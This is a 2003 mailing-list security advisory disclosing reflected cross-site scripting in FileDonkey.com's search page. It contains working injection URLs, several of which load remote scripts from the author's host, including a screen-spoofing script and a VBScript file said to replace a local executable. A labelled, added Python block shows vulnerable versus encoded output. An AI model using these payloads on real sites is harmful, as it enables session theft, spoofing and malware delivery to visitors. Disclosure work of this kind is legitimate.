Message-ID: <003a01c390e0$e3d95110$050010ac@Estila>
Date: Sun, 12 Oct 2003 18:49:59 +0200
From: "Lorenzo Hernandez Garcia-Hierro" <lorenzohgh@...g-security.com>
To: "Full-Disclosure" <full-disclosure@...ts.netsys.com>
Cc: "BUGTRAQ" <bugtraq@...urityfocus.com>, <webmaster@...edonkey.com>
Subject: FileDonkey.com Cross Site Scripting
FileDonkey.com Cross Site Scripting
------
WEBSITE: File Donkey
DOMAIN: www.filedonkey.com
RISK: 7
OWNERS STATUS: webmaster@...edonkey.com [ warned at the same time as the security lists ]
---------------------
--- DESCRIPTION ---
FileDonkey.com is the only web search engine supported by P2P clients such as eMule, xMule, etc.
FileDonkey is a widely used website for finding the files you want on the eDonkey (P2P) networks.
---------------------------------------------
|SECURITY HOLES FOUND and PROOFS OF CONCEPT:|
---------------------------------------------
I was making some tests on the FileDonkey website, but I didn't remember the search engine.
Search engines are the first systems affected by Cross Site Scripting holes because, normally, they have insufficient input validation and they produce output (search results) without checking for dangerous code. This can be exploited easily with a few lines of PHP code and a little knowledge of PHP and JavaScript.
---------------------------------------------
| CROSS SITE SCRIPTING HOLES FOUND |
---------------------------------------------
Located in the search engine, currently using a script with an HTML extension, search.html.
This script basically uses 5 variables:
pattern=[KEYWORDS]
min_size=[FILE MIN SIZE]
max_size=[FILE MAX SIZE]
scope=[FILE TYPE]
submit=[YOUR SUBMIT BUTTON CODE]
But only one is needed: pattern=
You must include the keywords for the wanted file, and, voilà! If the file is available, it provides you a nice list of results ( ed2k links ).
The keywords sent will be shown in ( if there are no available files ):
No files found for pattern 'NoSecureRootGroupSecurityResearch'.
Ok, it seems not vulnerable, but wait a moment: the keywords are also in the form field, and we know that a form field value always ends with a ">, so let's try!
.....We send the request in POST mode... or use this URL:
http://www.filedonkey.com/search.html?pattern="><script>alert('xD .- Shields Down ! -. xD');</script>
And we get...
-----JavaScript Application-----
| |
| xD .- Shields Down ! -. xD |
| |
|------------------------------|
The script was successfully executed on the client side.
Fantastic for attackers ( not me ;-).
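Added here as an illustration of the bug class (not code from the advisory or from FileDonkey): a constructed results page that reflects the keywords the two ways a server can, unencoded and entity-encoded, plus a check for whether a probe string comes back as live markup or as plain text in the search box.

```python
import html
import re

# Constructed stand-in for the results page described above (not FileDonkey's
# real markup): the keywords come back inside the form field and in the
# "No files found for pattern '...'" message.
PAGE = (
    '<form action="search.html">'
    '<input type="text" name="pattern" value="{value}">'
    '</form>'
    "<p>No files found for pattern '{value}'.</p>"
)

def render_vulnerable(pattern: str) -> str:
    """Reflects the keywords unencoded: a " and > in the input close the
    attribute and the tag, so whatever follows is parsed as new markup."""
    return PAGE.format(value=pattern)

def render_hardened(pattern: str) -> str:
    """Same page with HTML entity encoding applied at the output point.
    quote=True also encodes " and ', so the attribute cannot be closed early."""
    return PAGE.format(value=html.escape(pattern, quote=True))

SCRIPT_TAG = re.compile(r"<script\b", re.IGNORECASE)
VALUE_ATTR = re.compile(r'name="pattern" value="([^"]*)"')

def reflects_script_tag(page: str) -> bool:
    """Detection check on a response: is a live <script> tag present in the HTML?"""
    return SCRIPT_TAG.search(page) is not None

def reflected_value(page: str) -> str:
    """What the browser will actually show in the search box after decoding entities."""
    match = VALUE_ATTR.search(page)
    return html.unescape(match.group(1)) if match else ""

# Same shape as the advisory's test string, with a neutral alert message.
PROBE = '"><script>alert(1)</script>'

if __name__ == "__main__":
    for name, render in (("vulnerable", render_vulnerable), ("hardened", render_hardened)):
        page = render(PROBE)
        print(f"{name}: script tag present={reflects_script_tag(page)}, "
              f"search box shows={reflected_value(page)!r}")
```

On the vulnerable page the search box ends up empty and the probe becomes a real tag; on the hardened page the box shows the probe verbatim and no tag exists.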
We can try more things, and, of course, my beloved PHP performance:
.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.
| CODE FOR THE COMMON XSS TESTING TASKS |
.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.
/\ cut from here /\
<?php
// ----------------------------------
// XSS TESTING SCRIPT
// NO SECURE ROOT GROUP SECURITY RESEARCH
// BY LORENZO HERNANDEZ GARCIA-HIERRO
// * NOT FULL VERSION *
// ----------------------------------
$domain = "FileDonkey.com/Other";            // target label (unused in this cut-down version)
$member = "Lorenzo Hernandez Garcia-Hierro"; // author label (unused in this cut-down version)
$referer = getenv("HTTP_REFERER");           // page that linked here, if any (unused here)
$data = getenv("QUERY_STRING");              // raw query string, e.g. "XSS_TEST"
$xss = strip_tags($data);                    // drop HTML tags before echoing it back
echo "$xss";
?>
/\ xss-testing.php END ! /\
Please note that I removed lots of lines of the code to prevent bad uses of this.
A full version is running under
http://test-zone.nsrg-security.com/xss/?XSS_TEST
it has
-- THE REAL EXPLOITATION --
Now we start to exploit the XSS hole:
*-.Possible attacks:
1.- Including malicious scripts to execute them on the client side.
2.- Trying to steal cookie data ( no cookies are given by FileDonkey ).
3.- Trying to connect to malicious sites through Microsoft.XMLHTTP.
4.- Trying to use known vulnerabilities to steal other domains' data.
SOME PROOFS OF CONCEPT:
________________________
A script that I developed to change some web page stuff ( spoofing ):
http://www.filedonkey.com/search.html?pattern="><script%20src=http://test-zone.nsrg-security.com/xss/spoofing.js></script>
A Georgi Guninski script ( shows a blue screen that spoofs the whole screen ):
http://www.filedonkey.com/search.html?pattern="><script%20src=http://test-zone.nsrg-security.com/xss/blue.js></script>
Replaces the Windows Media Player executable with a non-dangerous file that shows a dialog with some nice stuff from the NSRGroup:
http://www.filedonkey.com/search.html?pattern="><script%20src=http://test-zone.nsrg-security.com/xss/malware.vbs></script>
The XSS standard testing script ( NSRGroup XSS-TST-STANDARD ):
http://test-zone.nsrg-security.com/xss/?XSS-TST-STANDARD
*//*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/
* REFERENCES -> ONLINE
/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/
http://advisories.nsrg-security.com/FileDonkey.com-XSS
-----------
| CONTACT |
-----------
-------------------------------
0x00->Lorenzo Hernandez Garcia-Hierro
0x01->Security Consultant
__________________________________
PGP: Keyfingerprint
B6D7 5FCC 78B4 97C1 4010 56BC 0E5F 2AB2
ID: 0x9C38E1D7
**********************************
No Secure Root Group Security Research Team
http://www.nsrg-security.com
______________________